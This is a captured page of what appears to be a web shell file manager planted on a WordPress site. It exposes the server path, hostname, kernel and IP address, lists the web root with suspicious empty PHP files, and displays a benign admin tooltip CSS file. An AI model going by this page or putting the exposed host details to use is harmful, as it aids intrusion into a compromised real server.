XANNYANAXIUM FILE MANAGER

Navigate and manage your files

Current Directory
Upload File
Standard Upload
Advanced Upload

Status: No file selected

Create New
Name Type Size Modified Permission Actions
/ .. Directory 2025-05-23 05:57:18 0755
/ wp-admin Directory 2026-08-24 09:01:10 0755
/ wp-content Directory 2026-09-21 07:22:43 0755
/ wp-includes Directory 2026-09-12 02:08:27 0755
.htaccess HTACCESS 1.92 KB 2026-05-07 22:43:39 0644
.htaccess.bk BK 1.15 KB 2025-11-21 07:04:52 0644
.htaccess_old HTACCESS_OLD 1.80 KB 2025-11-21 07:14:55 0644
.user.ini INI 9 bytes 2026-01-05 06:16:59 0644
atomlib.php PHP 0 bytes 2026-09-22 09:09:48 0644
default.php PHP 15.99 KB 2025-05-23 12:16:32 0644
edits.php PHP 0 bytes 2026-09-22 08:49:13 0644
index.php PHP 1.30 KB 2026-09-22 06:21:28 0644
license.txt TXT 19.44 KB 2026-08-20 12:39:46 0644
phpinfo.php PHP 20 bytes 2025-05-23 05:57:32 0644
readme.html HTML 7.23 KB 2026-09-18 01:39:40 0644
robots.txt TXT 405 bytes 2026-09-22 07:12:19 0644
wp-activate.php PHP 7.54 KB 2026-08-20 12:39:46 0644
wp-blog-header.php PHP 351 bytes 2025-05-23 12:16:32 0644
wp-comments-post.php PHP 2.27 KB 2025-05-23 12:16:32 0644
wp-config-sample.php PHP 3.26 KB 2025-12-03 12:55:30 0644
wp-config.php PHP 3.53 KB 2025-11-21 07:39:35 0644
wp-cron.php PHP 5.49 KB 2025-05-23 12:16:32 0644
wp-links-opml.php PHP 2.43 KB 2025-12-03 12:55:28 0644
wp-load.php PHP 3.84 KB 2025-05-23 12:16:32 0644
wp-login.php PHP 51.30 KB 2026-08-20 12:39:46 0644
wp-mail.php PHP 8.52 KB 2025-12-03 12:55:30 0644
wp-settings.php PHP 32.38 KB 2026-08-20 12:39:46 0644
wp-signup.php PHP 34.26 KB 2026-08-20 12:39:46 0644
wp-sx9a.php PHP 0 bytes 2026-09-22 08:49:04 0644
wp-trackback.php PHP 5.27 KB 2026-08-20 12:39:46 0644
xmlrpc.php PHP 3.13 KB 2025-05-23 12:16:32 0644
$#$#$#

Dir : /home/u358210906/domains/cvforum.in/public_html/wp-admin/css/
Server: Linux in-mum-web1754.main-hosting.eu 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
IP: 77.37.46.203
Choose File :

Url:
Dir : /home/u358210906/domains/cvforum.in/public_html/wp-admin/css/wp-tooltip.css

/* Accessible tooltip component. Markup from wp_get_tooltip(). */

.wp-tooltip {
	display: inline-flex;
	align-items: center;
}

/* Toggle and close buttons. */
.wp-tooltip .wp-tooltip__toggle,
.wp-tooltip .wp-tooltip__close {
	display: inline-flex;
	align-items: center;
	justify-content: center;
	width: 24px;
	height: 24px;
	padding: 0;
	border: 0;
	border-radius: 2px;
	background: none;
	color: #50575e;
	cursor: pointer;
}

.wp-tooltip:not(:has(button[aria-disabled="true"],button[disabled])) .wp-tooltip__toggle:hover,
.wp-tooltip:not(:has(button[aria-disabled="true"],button[disabled])) .wp-tooltip__toggle:focus,
.wp-tooltip .wp-tooltip__close:hover,
.wp-tooltip .wp-tooltip__close:focus {
	color: var(--wp-admin-theme-color, #3858e9);
}

/*
 * `:where()` keeps the wrapper out of the specificity total, so buttons
 * passed into a tooltip keep control of their own focus ring.
 */
:where(.wp-tooltip:not(:has(button[aria-disabled="true"],button[disabled]))) .wp-tooltip__toggle:focus,
.wp-tooltip .wp-tooltip__close:focus {
	outline: 2px solid transparent;
	box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9);
}

.wp-tooltip .wp-tooltip__toggle .dashicons {
	width: 20px;
	height: 20px;
	font-size: 20px;
}

.wp-tooltip .wp-tooltip__close .dashicons {
	width: 18px;
	height: 18px;
	font-size: 18px;
}

/* Bubble. No position here, so it falls back to the UA's centered popover without anchoring. */
.wp-tooltip .wp-tooltip__bubble {
	max-width: min(280px, calc(100vw - 32px));
	margin: auto;
	padding: 12px 16px;
	overflow: visible;
	border: 1px solid #c3c4c7;
	border-radius: 4px;
	background: #fff;
	color: #1d2327;
	font-size: 13px;
	font-weight: 400;
	line-height: 1.5;
	text-align: left;
	box-shadow: 0 3px 6px rgba(0, 0, 0, 0.08);
}

.wp-tooltip.wp-is-tooltip .wp-tooltip__bubble {
	background: #000;
	color: #f0f0f0;
	text-align: center;
	padding: 4px 8px;
	line-height: 1.4;
}

.wp-tooltip:not(.wp-is-tooltip) .wp-tooltip__text {
	display: block;
	padding-inline-end: 24px;
}

.wp-tooltip .wp-tooltip__close {
	position: absolute;
	top: 6px;
	inset-inline-end: 6px;
}

/* Anchor the bubble above its toggle, with a downward arrow. */
@supports (anchor-name: --a) {
	.wp-tooltip .wp-tooltip__bubble {
		position-area: top;
		margin: 0 0 8px;
		position-try-fallbacks: flip-block, flip-inline;
	}

	.wp-tooltip.wp-is-tooltip .wp-tooltip__bubble {
		margin: 0;
	}

	/* Arrow: gray border (::before) under a white fill (::after). */
	.wp-tooltip:not(.wp-is-tooltip) .wp-tooltip__bubble::before,
	.wp-tooltip:not(.wp-is-tooltip) .wp-tooltip__bubble::after {
		content: "";
		position: absolute;
		top: 100%;
		left: 50%;
		width: 0;
		height: 0;
		border: 8px solid transparent;
		border-bottom: 0;
	}

	.wp-tooltip:not(.wp-is-tooltip) .wp-tooltip__bubble::before {
		margin-left: -8px;
		border-top-color: #c3c4c7;
	}

	.wp-tooltip:not(.wp-is-tooltip) .wp-tooltip__bubble::after {
		margin-left: -7px;
		border-width: 7px;
		border-bottom: 0;
		border-top-color: #fff;
	}
}